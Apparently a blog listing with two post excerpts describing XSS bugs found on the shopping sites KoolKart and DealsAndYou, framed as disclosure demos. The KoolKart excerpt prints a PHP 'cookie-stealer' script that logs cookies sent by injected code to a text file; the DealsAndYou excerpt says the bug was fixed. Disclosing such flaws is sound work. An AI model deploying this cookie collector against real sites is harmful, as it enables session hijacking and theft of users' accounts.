Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.
Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).
$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
$current = file_get_contents($file);
$current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart. Continue reading
Dealsandyou.com, Y U NO sanitize input
Update: Dealsandyou has fixed the bug. Responded on twitter with a thanks.
I was looking at dealsandyou.com a couple of days back and something (may be their bad design) made me do a XSS vulnerability test on their “Search” input box using the XSS Locator code snippet. Voila!, an alert box popped up confirming my hunch. Continue reading